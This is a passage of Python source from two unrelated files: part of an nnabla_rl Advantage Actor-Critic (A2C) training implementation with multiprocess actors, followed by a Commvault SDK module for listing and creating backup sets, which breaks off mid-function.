learning_rate: float = 7e-4
entropy_coefficient: float = 0.01
value_coefficient: float = 0.5
decay: float = 0.99
epsilon: float = 1e-5
start_timesteps: int = 1
actor_num: int = 8
timelimit_as_terminal: bool = False
max_grad_norm: Optional[float] = 0.5
seed: int = -1
learning_rate_decay_iterations: int = 50000000
def __post_init__(self):
'''__post_init__
Check the set values are in valid range.
'''
self._assert_between(self.gamma, 0.0, 1.0, 'gamma')
self._assert_between(self.decay, 0.0, 1.0, 'decay')
self._assert_positive(self.n_steps, 'n_steps')
self._assert_positive(self.actor_num, 'actor num')
self._assert_positive(self.learning_rate, 'learning_rate')
class DefaultPolicyBuilder(ModelBuilder[StochasticPolicy]):
def build_model(self, # type: ignore[override]
scope_name: str,
env_info: EnvironmentInfo,
algorithm_config: A2CConfig,
**kwargs) -> StochasticPolicy:
_shared_function_head = A3CSharedFunctionHead(scope_name="shared",
state_shape=env_info.state_shape)
return A3CPolicy(head=_shared_function_head,
scope_name="shared",
state_shape=env_info.state_shape,
action_dim=env_info.action_dim)
class DefaultVFunctionBuilder(ModelBuilder[VFunction]):
def build_model(self, # type: ignore[override]
scope_name: str,
env_info: EnvironmentInfo,
algorithm_config: A2CConfig,
**kwargs) -> VFunction:
_shared_function_head = A3CSharedFunctionHead(scope_name="shared",
state_shape=env_info.state_shape)
return A3CVFunction(head=_shared_function_head,
scope_name="shared",
state_shape=env_info.state_shape)
class DefaultSolverBuilder(SolverBuilder):
def build_solver(self, # type: ignore[override]
env_info: EnvironmentInfo,
algorithm_config: A2CConfig,
**kwargs) -> nn.solver.Solver:
return NS.RMSprop(lr=algorithm_config.learning_rate,
decay=algorithm_config.decay,
eps=algorithm_config.epsilon)
class A2C(Algorithm):
'''Advantage Actor-Critic (A2C) algorithm implementation.
This class implements the Advantage Actor-Critic (A2C) algorithm.
A2C is the synchronous version of A3C, Asynchronous Advantage Actor-Critic.
A3C was proposed by V. Mnih, et al. in the paper: "Asynchronous Methods for Deep Reinforcement Learning"
For detail see: https://arxiv.org/abs/1602.01783
This algorithm only supports online training.
Args:
env_or_env_info\
(gym.Env or :py:class:`EnvironmentInfo <nnabla_rl.environments.environment_info.EnvironmentInfo>`):
the environment to train or environment info
v_function_builder (:py:class:`ModelBuilder[VFunction] <nnabla_rl.builders.ModelBuilder>`):
builder of v function models
v_solver_builder (:py:class:`SolverBuilder <nnabla_rl.builders.SolverBuilder>`): builder for v function solvers
policy_builder (:py:class:`ModelBuilder[StochasicPolicy] <nnabla_rl.builders.ModelBuilder>`):
builder of policy models
policy_solver_builder (:py:class:`SolverBuilder <nnabla_rl.builders.SolverBuilder>`): builder for policy solvers
config (:py:class:`A2CConfig <nnabla_rl.algorithms.a2c.A2CConfig>`): configuration of A2C algorithm
'''
# type declarations to type check with mypy
# NOTE: declared variables are instance variable and NOT class variable, unless it is marked with ClassVar
# See https://mypy.readthedocs.io/en/stable/class_basics.html for details
_config: A2CConfig
_v_function: VFunction
_v_function_solver: nn.solver.Solver
_policy: StochasticPolicy
_policy_solver: nn.solver.Solver
_actors: List['_A2CActor']
_actor_processes: List[mp.Process]
_eval_state_var: nn.Variable
_eval_action: nn.Variable
_s_current_var: nn.Variable
_a_current_var: nn.Variable
_returns_var: nn.Variable
_policy_trainer: ModelTrainer
_v_function_trainer: ModelTrainer
_policy_solver_builder: SolverBuilder
_v_solver_builder: SolverBuilder
_policy_trainer_state: Dict[str, Any]
_v_function_trainer_state: Dict[str, Any]
def __init__(self, env_or_env_info,
v_function_builder: ModelBuilder[VFunction] = DefaultVFunctionBuilder(),
v_solver_builder: SolverBuilder = DefaultSolverBuilder(),
policy_builder: ModelBuilder[StochasticPolicy] = DefaultPolicyBuilder(),
policy_solver_builder: SolverBuilder = DefaultSolverBuilder(),
config=A2CConfig()):
super(A2C, self).__init__(env_or_env_info, config=config)
# Initialize on cpu and change the context later
with nn.context_scope(context.get_nnabla_context(-1)):
self._policy = policy_builder('pi', self._env_info, self._config)
self._v_function = v_function_builder('v', self._env_info, self._config)
self._policy_solver = policy_solver_builder(self._env_info, self._config)
self._policy_solver_builder = policy_solver_builder # keep for later use
self._v_function_solver = v_solver_builder(self._env_info, self._config)
self._v_solver_builder = v_solver_builder # keep for later use
@eval_api
def compute_eval_action(self, state, *, begin_of_episode=False):
with nn.context_scope(context.get_nnabla_context(self._config.gpu_id)):
state = add_batch_dimension(state)
if not hasattr(self, '_eval_state_var'):
self._eval_state_var = create_variable(1, self._env_info.state_shape)
distribution = self._policy.pi(self._eval_state_var)
self._eval_action = distribution.sample()
self._eval_action.need_grad = False
set_data_to_variable(self._eval_state_var, state)
self._eval_action.forward(clear_no_need_grad=True)
action = np.squeeze(self._eval_action.d, axis=0)
if self._env_info.is_discrete_action_env():
return np.int(action)
else:
return action
def _before_training_start(self, env_or_buffer):
if not self._is_env(env_or_buffer):
raise ValueError('A2C only supports online training')
env = env_or_buffer
# FIXME: This setup is a workaround for creating underlying model parameters
# If the parameter is not created, the multiprocessable array (created in launch_actor_processes)
# will be empty and the agent does not learn anything
context.set_nnabla_context(-1)
self._setup_policy_training(env)
self._setup_v_function_training(env)
self._actors, self._actor_processes = self._launch_actor_processes(env)
# NOTE: Setting gpu context after the launch of processes
# If you set the gpu context before the launch of proceses, the process will corrupt
context.set_nnabla_context(self._config.gpu_id)
# Setup again here to use gpu (if it is set)
old_policy_solver = self._policy_solver
self._policy_solver = self._policy_solver_builder(self._env_info, self._config)
self._policy_trainer = self._setup_policy_training(env)
self._policy_solver.set_states(old_policy_solver.get_states())
old_v_function_solver = self._v_function_solver
self._v_function_solver = self._v_solver_builder(self._env_info, self._config)
self._v_function_trainer = self._setup_v_function_training(env)
self._v_function_solver.set_states(old_v_function_solver.get_states())
def _setup_policy_training(self, env_or_buffer):
policy_trainer_config = MT.policy_trainers.A2CPolicyTrainerConfig(
entropy_coefficient=self._config.entropy_coefficient,
max_grad_norm=self._config.max_grad_norm
)
policy_trainer = MT.policy_trainers.A2CPolicyTrainer(
models=self._policy,
solvers={self._policy.scope_name: self._policy_solver},
env_info=self._env_info,
config=policy_trainer_config)
return policy_trainer
def _setup_v_function_training(self, env_or_buffer):
# training input/loss variables
v_function_trainer_config = MT.v_value.MonteCarloVTrainerConfig(
reduction_method='mean',
v_loss_scalar=self._config.value_coefficient,
max_grad_norm=self._config.max_grad_norm
)
v_function_trainer = MT.v_value.MonteCarloVTrainer(
train_functions=self._v_function,
solvers={self._v_function.scope_name: self._v_function_solver},
env_info=self._env_info,
config=v_function_trainer_config
)
return v_function_trainer
def _launch_actor_processes(self, env):
actors = self._build_a2c_actors(env, v_function=self._v_function, policy=self._policy)
processes = []
for actor in actors:
p = mp.Process(target=actor, daemon=True)
p.start()
processes.append(p)
return actors, processes
def _build_a2c_actors(self, env, v_function, policy):
actors = []
for i in range(self._config.actor_num):
actor = _A2CActor(actor_num=i,
env=env,
env_info=self._env_info,
v_function=v_function,
policy=policy,
config=self._config)
actors.append(actor)
return actors
def _after_training_finish(self, env_or_buffer):
for actor in self._actors:
actor.dispose()
for process in self._actor_processes:
self._kill_actor_processes(process)
def _kill_actor_processes(self, process):
process.terminate()
process.join()
def _run_online_training_iteration(self, env):
update_interval = self._config.n_steps * self._config.actor_num
if self.iteration_num % update_interval != 0:
return
experiences = self._collect_experiences(self._actors)
self._a2c_training(experiences)
def _run_offline_training_iteration(self, buffer):
raise NotImplementedError
def _collect_experiences(self, actors):
for actor in actors:
actor.update_v_params(self._v_function.get_parameters())
actor.update_policy_params(self._policy.get_parameters())
actor.run_data_collection()
results = [actor.wait_data_collection() for actor in actors]
return (np.concatenate(item, axis=0) for item in unzip(results))
def _a2c_training(self, experiences):
s, a, returns = experiences
advantage = self._compute_advantage(s, returns)
extra = {}
extra['advantage'] = advantage
extra['v_target'] = returns
batch = TrainingBatch(batch_size=len(a),
s_current=s,
a_current=a,
extra=extra)
# lr decay
alpha = self._config.learning_rate
if 0 < self._config.learning_rate_decay_iterations:
learning_rate_decay = max(1.0 - self._iteration_num / self._config.learning_rate_decay_iterations, 0.0)
alpha = alpha * learning_rate_decay
self._policy_trainer.set_learning_rate(alpha)
self._v_function_trainer.set_learning_rate(alpha)
# model update
self._policy_trainer_state = self._policy_trainer.train(batch)
self._v_function_trainer_state = self._v_function_trainer.train(batch)
def _compute_advantage(self, s, returns):
if not hasattr(self, '_state_var_for_advantage'):
self._state_var_for_advantage = nn.Variable(s.shape)
self._returns_var_for_advantage = nn.Variable(returns.shape)
v_for_advantage = self._v_function.v(self._state_var_for_advantage)
self._advantage = self._returns_var_for_advantage - v_for_advantage
self._advantage.need_grad = False
self._state_var_for_advantage.d = s
self._returns_var_for_advantage.d = returns
self._advantage.forward(clear_no_need_grad=True)
return self._advantage.d
def _models(self):
models = {}
models[self._policy.scope_name] = self._policy
models[self._v_function.scope_name] = self._v_function
return models
def _solvers(self):
solvers = {}
solvers[self._policy.scope_name] = self._policy_solver
solvers[self._v_function.scope_name] = self._v_function_solver
return solvers
@classmethod
def is_supported_env(cls, env_or_env_info):
env_info = EnvironmentInfo.from_env(env_or_env_info) if isinstance(env_or_env_info, gym.Env) \
else env_or_env_info
return not env_info.is_continuous_action_env()
@property
def latest_iteration_state(self):
latest_iteration_state = super(A2C, self).latest_iteration_state
if hasattr(self, '_policy_trainer_state'):
latest_iteration_state['scalar'].update({'pi_loss': float(self._policy_trainer_state['pi_loss'])})
if hasattr(self, '_v_function_trainer_state'):
latest_iteration_state['scalar'].update({'v_loss': float(self._v_function_trainer_state['v_loss'])})
return latest_iteration_state
class _A2CActor(object):
def __init__(self, actor_num, env, env_info, policy, v_function, config):
self._actor_num = actor_num
self._env = env
self._env_info = env_info
self._policy = policy
self._v_function = v_function
self._n_steps = config.n_steps
self._gamma = config.gamma
self._config = config
# IPC communication variables
self._disposed = mp.Value('i', False)
self._task_start_event = mp.Event()
self._task_finish_event = mp.Event()
self._policy_mp_arrays = new_mp_arrays_from_params(policy.get_parameters())
self._v_function_mp_arrays = new_mp_arrays_from_params(v_function.get_parameters())
explorer_config = EE.RawPolicyExplorerConfig(initial_step_num=0,
timelimit_as_terminal=self._config.timelimit_as_terminal)
self._environment_explorer = EE.RawPolicyExplorer(policy_action_selector=self._compute_action,
env_info=self._env_info,
config=explorer_config)
obs_space = self._env.observation_space
action_space = self._env.action_space
MultiProcessingArrays = namedtuple('MultiProcessingArrays', ['state', 'action', 'returns'])
state_mp_array_shape = (self._n_steps, *obs_space.shape)
state_mp_array = mp_array_from_np_array(
np.empty(shape=state_mp_array_shape, dtype=obs_space.dtype))
if env_info.is_discrete_action_env():
action_mp_array_shape = (self._n_steps, 1)
action_mp_array = mp_array_from_np_array(
np.empty(shape=action_mp_array_shape, dtype=action_space.dtype))
else:
action_mp_array_shape = (self._n_steps, action_space.shape[0])
action_mp_array = mp_array_from_np_array(
np.empty(shape=action_mp_array_shape, dtype=action_space.dtype))
scalar_mp_array_shape = (self._n_steps, 1)
returns_mp_array = mp_array_from_np_array(
np.empty(shape=scalar_mp_array_shape, dtype=np.float32))
self._mp_arrays = MultiProcessingArrays(
(state_mp_array, state_mp_array_shape, obs_space.dtype),
(action_mp_array, action_mp_array_shape, action_space.dtype),
(returns_mp_array, scalar_mp_array_shape, np.float32)
)
def __call__(self):
self._run_actor_loop()
def dispose(self):
self._disposed = True
self._task_start_event.set()
def run_data_collection(self):
self._task_finish_event.clear()
self._task_start_event.set()
def wait_data_collection(self):
self._task_finish_event.wait()
return (mp_to_np_array(mp_array, shape, dtype) for (mp_array, shape, dtype) in self._mp_arrays)
def update_v_params(self, params):
self._update_params(src=params, dest=self._v_function_mp_arrays)
def update_policy_params(self, params):
self._update_params(src=params, dest=self._policy_mp_arrays)
def _run_actor_loop(self):
context.set_nnabla_context(self._config.gpu_id)
if self._config.seed >= 0:
seed = self._actor_num + self._config.seed
else:
seed = os.getpid()
set_global_seed(seed)
self._env.seed(seed)
while (True):
self._task_start_event.wait()
if self._disposed.get_obj():
break
self._synchronize_policy_params(self._policy.get_parameters())
self._synchronize_v_function_params(self._v_function.get_parameters())
experiences = self._run_data_collection()
self._fill_result(experiences)
self._task_start_event.clear()
self._task_finish_event.set()
def _run_data_collection(self):
experiences = self._environment_explorer.step(self._env, n=self._n_steps, break_if_done=False)
s_last = experiences[-1][4]
experiences = [(s, a, r, non_terminal)
for (s, a, r, non_terminal, *_) in experiences]
processed_experiences = self._process_experiences(experiences, s_last)
return processed_experiences
def _process_experiences(self, experiences, s_last):
(s, a, r, non_terminal) = marshal_experiences(experiences)
v_last = self._compute_v(s_last)
returns = self._compute_returns(r, non_terminal, v_last)
return (s, a, returns)
def _compute_returns(self, rewards, non_terminals, value_last):
returns = []
R = value_last
for i, (r, non_terminal) in enumerate(zip(rewards[::-1], non_terminals[::-1])):
R = r + self._gamma * R * non_terminal
returns.insert(0, [R])
return np.array(returns)
def _compute_v(self, s):
s = np.expand_dims(s, axis=0)
if not hasattr(self, '_state_var'):
self._state_var = nn.Variable(s.shape)
self._v_var = self._v_function.v(self._state_var)
self._v_var.need_grad = False
self._state_var.d = s
self._v_var.forward(clear_no_need_grad=True)
v = self._v_var.d.copy()
return v
def _fill_result(self, experiences):
def array_and_dtype(mp_arrays_item):
return mp_arrays_item[0], mp_arrays_item[2]
(s, a, returns) = experiences
np_to_mp_array(s, *array_and_dtype(self._mp_arrays.state))
np_to_mp_array(a, *array_and_dtype(self._mp_arrays.action))
np_to_mp_array(returns, *array_and_dtype(self._mp_arrays.returns))
@eval_api
def _compute_action(self, s, *, begin_of_episode=False):
s = np.expand_dims(s, axis=0)
if not hasattr(self, '_eval_state_var'):
self._eval_state_var = nn.Variable(s.shape)
distribution = self._policy.pi(self._eval_state_var)
self._eval_action = distribution.sample()
self._eval_state_var.need_grad = False
self._eval_action.need_grad = False
self._eval_state_var.d = s
self._eval_action.forward(clear_no_need_grad=True)
action = np.squeeze(self._eval_action.d, axis=0)
if self._env_info.is_discrete_action_env():
return np.int(action), {}
else:
return action, {}
def _update_params(self, src, dest):
copy_params_to_mp_arrays(src, dest)
def _synchronize_policy_params(self, params):
self._synchronize_params(src=self._policy_mp_arrays, dest=params)
def _synchronize_v_function_params(self, params):
self._synchronize_params(src=self._v_function_mp_arrays, dest=params)
def _synchronize_params(self, src, dest):
copy_mp_arrays_to_params(src, dest)
|
backupset.py
|
# -*- coding: utf-8 -*-
# --------------------------------------------------------------------------
# Copyright Commvault Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# --------------------------------------------------------------------------
"""Main file for performing backup set operations.
Backupsets and Backupset are 2 classes defined in this file.
Backupsets: Class for representing all the backup sets associated with a specific agent
Backupset: Class for a single backup set selected for an agent,
and to perform operations on that backup set
Backupsets:
===========
__init__(class_object) -- initialise object of Backupsets class associated with
the specified agent/instance
__str__() -- returns all the backupsets associated with the agent
__repr__() -- returns the string for the instance of the Backupsets class
__len__() -- returns the number of backupsets associated with the Agent
__getitem__() -- returns the name of the backupset for the given backupset Id
or the details for the given backupset name
_get_backupsets() -- gets all the backupsets associated with the agent specified
default_backup_set() -- returns the name of the default backup set
all_backupsets() -- returns the dict of all the backupsets for the Agent /
Instance of the selected Client
has_backupset(backupset_name) -- checks if a backupset exists with the given name or not
_process_add_response() -- to process the add backupset request using API call
add(backupset_name) -- adds a new backupset to the agent of the specified client
add_archiveset(archiveset_name) -- adds a new archiveset to the agent of the specified client
add_salesforce_backupset() -- adds a new salesforce backupset
get(backupset_name) -- returns the Backupset class object
of the input backup set name
delete(backupset_name) -- removes the backupset from the agent of the specified client
refresh() -- refresh the backupsets associated with the agent
Backupset:
==========
__init__() -- initialise object of Backupset with the specified backupset
name and id, and associated to the specified instance
__getattr__() -- provides access to restore helper methods
__repr__() -- return the backupset name, the instance is associated with
_get_backupset_id() -- method to get the backupset id, if not specified in __init__
_get_backupset_properties() -- get the properties of this backupset
_run_backup() -- runs full backup for the specified subclient,
and appends the job object to the return list
_update() -- updates the properties of the backupset
_get_epoch_time() -- gets the Epoch time given the input time is in format
%Y-%m-%d %H:%M:%S
_set_defaults() -- recursively sets default values on a dictionary
_prepare_browse_options() -- prepares the options for the Browse/find operation
_prepare_browse_json() -- prepares the JSON object for the browse request
_process_browse_response() -- retrieves the items from browse response
_process_update_request() -- to process the request using API call
_do_browse() -- performs a browse operation with the given options
update_properties() -- updates the backupset properties
set_default_backupset() -- sets the backupset as the default backup set for the agent,
if not already default
backup() -- runs full backup for all subclients
associated with this backupset
browse() -- browse the content of the backupset
find() -- find content in the backupset
refresh() -- refresh the properties of the backupset
delete_data() -- deletes items from the backupset and makes then unavailable
to browse and restore
Backupset instance Attributes
-----------------------------
**properties** -- returns the properties of backupset
**name** -- returns the name of the backupset
**guid** -- treats the backupset GUID as a property
of the Backupset class
"""
from __future__ import absolute_import
from __future__ import unicode_literals
import threading
import time
import copy
from base64 import b64encode
from past.builtins import basestring
from .subclient import Subclients
from .schedules import Schedules
from .exception import SDKException
class Backupsets(object):
"""Class for getting all the backupsets associated with a client."""
def __init__(self, class_object):
"""Initialize object of the Backupsets class.
Args:
class_object (object) -- instance of the Agent / Instance class
Returns:
object - instance of the Backupsets class
Raises:
SDKException:
if class object is not an instance of the Agent / Instance class
"""
from .agent import Agent
from .instance import Instance
self._instance_object = None
if isinstance(class_object, Agent):
self._agent_object = class_object
elif isinstance(class_object, Instance):
self._instance_object = class_object
self._agent_object = class_object._agent_object
else:
raise SDKException('Backupset', '103')
self._client_object = self._agent_object._client_object
self._commcell_object = self._agent_object._commcell_object
self._cvpysdk_object = self._commcell_object._cvpysdk_object
self._services = self._commcell_object._services
self._update_response_ = self._commcell_object._update_response_
self._BACKUPSETS = self._services['GET_ALL_BACKUPSETS'] % (self._client_object.client_id)
from .backupsets.fsbackupset import FSBackupset
from .backupsets.nasbackupset import NASBackupset
from .backupsets.hanabackupset import HANABackupset
from .backupsets.cabackupset import CloudAppsBackupset
from .backupsets.postgresbackupset import PostgresBackupset
from .backupsets.adbackupset import ADBackupset
from .backupsets.db2backupset import DB2Backupset
from .backupsets.vsbackupset import VSBackupset
from .backupsets.aadbackupset import AzureAdBackupset
from .backupsets.sharepointbackupset import SharepointBackupset
self._backupsets_dict = {
'file system': FSBackupset,
'nas': NASBackupset, # SP11 or lower CS honors NAS as the Agent Name
'ndmp': NASBackupset, # SP12 and above honors NDMP as the Agent Name
'sap hana': HANABackupset,
'cloud apps': CloudAppsBackupset,
'postgresql': PostgresBackupset,
"active directory" : ADBackupset,
'db2': DB2Backupset,
'virtual server': VSBackupset,
"azure ad" : AzureAdBackupset,
'sharepoint server': SharepointBackupset
}
if self._agent_object.agent_name in ['cloud apps', 'sql server', 'sap hana']:
self._BACKUPSETS += '&excludeHidden=0'
self._backupsets = None
self._default_backup_set = None
self.refresh()
def __str__(self):
"""Representation string consisting of all backupsets of the agent of a client.
Returns:
str - string of all the backupsets of an agent of a client
"""
representation_string = '{:^5}\t{:^20}\t{:^20}\t{:^20}\t{:^20}\n\n'.format(
'S. No.', 'Backupset', 'Instance', 'Agent', 'Client'
)
for index, backupset in enumerate(self._backupsets):
sub_str = '{:^5}\t{:20}\t{:20}\t{:20}\t{:20}\n'.format(
index + 1,
backupset.split('\\')[-1],
self._backupsets[backupset]['instance'],
self._agent_object.agent_name,
self._client_object.client_name
)
representation_string += sub_str
return representation_string.strip()
def __repr__(self):
"""Representation string for the instance of the Backupsets class."""
return "Backupsets class instance for Agent: '{0}'".format(self._agent_object.agent_name)
def __len__(self):
"""Returns the number of the backupsets for the selected Agent."""
return len(self.all_backupsets)
def __getitem__(self, value):
"""Returns the name of the backupset for the given backupset ID or
the details of the backupset for given backupset Name.
Args:
value (str / int) -- Name or ID of the backupset
Returns:
str - name of the backupset, if the backupset id was given
dict - dict of details of the backupset, if backupset name was given
Raises:
IndexError:
no backupset exists with the given Name / Id
"""
value = str(value)
if value in self.all_backupsets:
return self.all_backupsets[value]
else:
try:
return list(
filter(lambda x: x[1]['id'] == value, self.all_backupsets.items())
)[0][0]
except IndexError:
raise IndexError('No backupset exists with the given Name / Id')
def _get_backupsets(self):
"""Gets all the backupsets associated to the agent specified by agent_object.
Returns:
dict - consists of all backupsets of the agent
{
"backupset1_name": {
"id": backupset1_id,
"instance": instance
},
"backupset2_name": {
"id": backupset2_id,
"instance": instance
}
}
Raises:
SDKException:
if response is empty
if response is not success
"""
flag, response = self._cvpysdk_object.make_request('GET', self._BACKUPSETS)
if flag:
if response.json() and 'backupsetProperties' in response.json():
return_dict = {}
for dictionary in response.json()['backupsetProperties']:
agent = dictionary['backupSetEntity']['appName'].lower()
instance = dictionary['backupSetEntity']['instanceName'].lower()
if self._instance_object is not None:
if (self._instance_object.instance_name in instance and
self._agent_object.agent_name in agent):
temp_name = dictionary['backupSetEntity']['backupsetName'].lower()
temp_id = str(dictionary['backupSetEntity']['backupsetId']).lower()
return_dict[temp_name] = {
"id": temp_id,
"instance": instance
}
if dictionary['commonBackupSet'].get('isDefaultBackupSet'):
self._default_backup_set = temp_name
elif self._agent_object.agent_name in agent:
temp_name = dictionary['backupSetEntity']['backupsetName'].lower()
temp_id = str(dictionary['backupSetEntity']['backupsetId']).lower()
if len(self._agent_object.instances.all_instances) > 1:
return_dict["{0}\\{1}".format(instance, temp_name)] = {
"id": temp_id,
"instance": instance
}
if dictionary['commonBackupSet'].get('isDefaultBackupSet'):
self._default_backup_set = "{0}\\{1}".format(instance, temp_name)
else:
return_dict[temp_name] = {
"id": temp_id,
"instance": instance
}
if dictionary['commonBackupSet'].get('isDefaultBackupSet'):
self._default_backup_set = temp_name
return return_dict
else:
raise SDKException('Response', '102')
else:
raise SDKException('Response', '101', self._update_response_(response.text))
@property
def all_backupsets(self):
"""Returns the dict of backupsets for the Agent / Instance of the selected Client
dict - consists of all backupsets
{
"backupset1_name": {
"id": backupset1_id,
"instance": instance
},
"backupset2_name": {
"id": backupset2_id,
"instance": instance
}
}
"""
return self._backupsets
def has_backupset(self, backupset_name):
"""Checks if a backupset exists for the agent with the input backupset name.
Args:
backupset_name (str) -- name of the backupset
Returns:
bool - boolean output whether the backupset exists for the agent or not
Raises:
SDKException:
if type of the backupset name argument is not string
"""
if not isinstance(backupset_name, basestring):
raise SDKException('Backupset', '101')
return self._backupsets and backupset_name.lower() in self._backupsets
def _process_add_response(self, backupset_name, request_json):
"""Runs the Backupset Add API with the request JSON provided,
and returns the contents after parsing the response.
Args:
backupset_name (str) -- backupset name
request_json (dict) -- JSON request to run for the API
Returns:
(bool, basestring, basestring):
bool - flag specifies whether success / failure
str - error code received in the response
str - error message received
Raises:
SDKException:
if response is empty
if response is not success
"""
flag, response = self._cvpysdk_object.make_request('POST', self._services['ADD_BACKUPSET'], request_json)
if flag:
if response.json():
if 'response' in response.json():
error_code = response.json()['response'][0]['errorCode']
if error_code != 0:
error_string = response.json()['response'][0]['errorString']
o_str = 'Failed to create backupset\nError: "{0}"'.format(error_string)
raise SDKException('Backupset', '102', o_str)
else:
# initialize the backupsets again
# so the backupset object has all the backupsets
self.refresh()
return self.get(backupset_name)
elif 'errorMessage' in response.json():
error_string = response.json()['errorMessage']
o_str = 'Failed to create backuspet\nError: "{0}"'.format(error_string)
raise SDKException('Backupset', '102', o_str)
else:
raise SDKException('Response', '102')
else:
raise SDKException('Response', '102')
else:
raise SDKException('Response', '101', self._update_response_(response.text))
def add(self, backupset_name, on_demand_backupset=False, **kwargs):
"""Adds a new backup set to the agent.
Args:
backupset_name (str) -- name of the new backupset to add
on_demand_backupset (bool) -- flag to specify whether the backupset to be added
is a simple backupset or an on-demand backupset
default: False
**kwargs -- dict of keyword arguments as follows:
storage_policy (str) -- name of the storage policy to associate to the
backupset
plan_name (str) -- name of the plan to associate to the backupset
Returns:
object - instance of the Backupset class, if created successfully
Raises:
SDKException:
if type of the backupset name argument is not string
if failed to create a backupset
if response is empty
if response is not success
if backupset with same name already exists
"""
if not (isinstance(backupset_name, basestring) and isinstance(on_demand_backupset, bool)):
raise SDKException('Backupset', '101')
else:
backupset_name = backupset_name.lower()
if self.has_backupset(backupset_name):
raise SDKException(
'Backupset', '102', 'Backupset "{0}" already exists.'.format(backupset_name)
)
if self._instance_object is None:
if self._agent_object.instances.has_instance('DefaultInstanceName'):
self._instance_object = self._agent_object.instances.get('DefaultInstanceName')
else:
self._instance_object = self._agent_object.instances.get(
sorted(self._agent_object.instances.all_instances)[0]
)
request_json = {
"association": {
"entity": [{
"clientName": self._client_object.client_name,
"appName": self._agent_object.agent_name,
"instanceName": self._instance_object.instance_name,
"backupsetName": backupset_name
}]
},
"backupSetInfo": {
"commonBackupSet": {
"onDemandBackupset": on_demand_backupset
}
}
}
agent_settings = {
'db2': """
request_json['backupSetInfo'].update({
'db2BackupSet': {
'dB2DefaultIndexSP': {
'storagePolicyName': kwargs.get('storage_policy', '')
}
}
})
"""
}
exec(agent_settings.get(self._agent_object.agent_name, ''))
if kwargs.get('plan_name'):
plan_entity_dict = {
"planName": kwargs.get('plan_name')
}
request_json['backupSetInfo']['planEntity'] = plan_entity_dict
flag, response = self._cvpysdk_object.make_request(
'POST', self._services['ADD_BACKUPSET'], request_json
)
if flag:
if response.json():
if 'response' in response.json():
response_value = response.json()['response'][0]
error_code = str(response_value['errorCode'])
error_message = None
if 'errorString' in response_value:
error_message = response_value['errorString']
if error_message:
o_str = 'Failed to create new backupset\nError: "{0}"'.format(
error_message
)
raise SDKException('Backupset', '102', o_str)
else:
if error_code == '0':
# initialize the backupsets again
# so the backupsets object has all the backupsets
self.refresh()
return self.get(backupset_name)
else:
o_str = ('Failed to create new backupset with error code: "{0}"\n'
'Please check the documentation for '
'more details on the error').format(error_code)
raise SDKException('Backupset', '102', o_str)
else:
error_code = response.json()['errorCode']
error_message = response.json()['errorMessage']
o_str = 'Failed to create new backupset\nError: "{0}"'.format(
error_message
)
raise SDKException('Backupset', '102', o_str)
else:
raise SDKException('Response', '102')
else:
raise SDKException('Response', '101', self._update_response_(response.text))
def add_archiveset(self, archiveset_name):
"""
Adds a new archiveset to the agent. It is just a backupset but is mainly used for archive only items
Args:
archiveset_name (str) -- name of new archiveset to add
Returns:
object - instance of the Backupset class, if created successfully
Raises:
SDKException:
if type of the archiveset name argument is not string
if failed to create a archiveset
if response is empty
if response is not success
if archiveset with same name already exists
"""
if not (isinstance(archiveset_name, basestring)):
raise SDKException('Backupset', '101')
else:
archiveset_name = archiveset_name.lower()
if self.has_backupset(archiveset_name):
raise SDKException('archiveset_name', '102', 'Archiveset "{0}" already exists.'.format(archiveset_name))
request_json = {
"backupSetInfo": {
"useContentFromPlan": False,
"planEntity": {},
"commonBackupSet": {
"isArchivingEnabled": True,
"isDefaultBackupSet": False
},
"backupSetEntity": {
"_type_": 6,
"clientId": int(self._client_object.client_id),
"backupsetName": archiveset_name,
"applicationId": int(self._agent_object.agent_id)
},
"subClientList": [
{
"contentOperationType": 1,
"fsSubClientProp": {
"useGlobalFilters": 2,
"forcedArchiving": True,
"diskCleanupRules": {
"enableArchivingWithRules": True,
"diskCleanupFileTypes": {}
}
},
"content": [
{
"path": ""
}
]
}
]
}
}
flag, response = self._cvpysdk_object.make_request(
'POST', self._services['ADD_BACKUPSET'], request_json
)
if flag:
if response.json():
if 'response' in response.json():
response_value = response.json()['response'][0]
error_code = str(response_value['errorCode'])
error_message = None
if 'errorString' in response_value:
error_message = response_value['errorString']
if error_message:
o_str = 'Failed to create new Archiveset\nError: "{0}"'.format(
error_message
)
raise SDKException('Archiveset', '102', o_str)
else:
if error_code == '0':
# initialize the backupsets again
# so the backupsets object has all the backupsets
self.refresh()
return self.get(archiveset_name)
else:
o_str = ('Failed to create new Archiveset with error code: "{0}"\n'
'Please check the documentation for '
'more details on the error').format(error_code)
raise SDKException('Backupset', '102', o_str)
else:
error_code = response.json()['errorCode']
error_message = response.json()['errorMessage']
o_str = 'Failed to create new Archiveset\nError: "{0}"'.format(
error_message
)
raise SDKException('Backupset', '102', o_str)
else:
raise SDKException('Response', '102')
else:
raise SDKException('Response', '101', self._update_response_(response.text))
def add_salesforce_backupset(
self,
salesforce_options,
db_options=None, **kwargs):
"""Adds a new Salesforce Backupset to the Commcell.
Args:
salesforce_options (dict) -- salesforce options
{
"salesforce_user_name": 'salesforce login user',
"salesforce_user_password": 'salesforce user password',
"salesforce_user_token": 'salesforce user token'
}
db_options (dict) -- database options to configure sync db
{
"db_enabled": 'True or False',
"db_type": 'SQLSERVER or POSTGRESQL',
"db_host_name": 'database hostname',
"db_instance": 'database instance name',
"db_name": 'database name',
"db_port": 'port of the database',
"db_user_name": 'database user name',
"db_user_password": 'database user password'
}
**kwargs (dict) -- dict of keyword arguments as follows
download_cache_path (str) -- download cache path
mutual_auth_path (str) -- mutual auth cert path
storage_policy (str) -- storage policy
streams (int) -- number of streams
Returns:
object - instance of the Backupset class for this new backupset
Raises:
SDKException:
if backupset with given name already exists
if failed to add the backupset
if response is empty
if response is not success
"""
if db_options is None:
db_options = {'db_enabled': False}
if self.has_backupset(salesforce_options.get('salesforce_user_name')):
raise SDKException('Backupset', '102',
'Backupset "{0}" already exists.'.format(salesforce_options.get('salesforce_user_name')))
salesforce_password = b64encode(salesforce_options.get('salesforce_user_password').encode()).decode()
salesforce_token = b64encode(salesforce_options.get('salesforce_user_token', '').encode()).decode()
db_user_password = ""
if db_options.get('db_enabled', False):
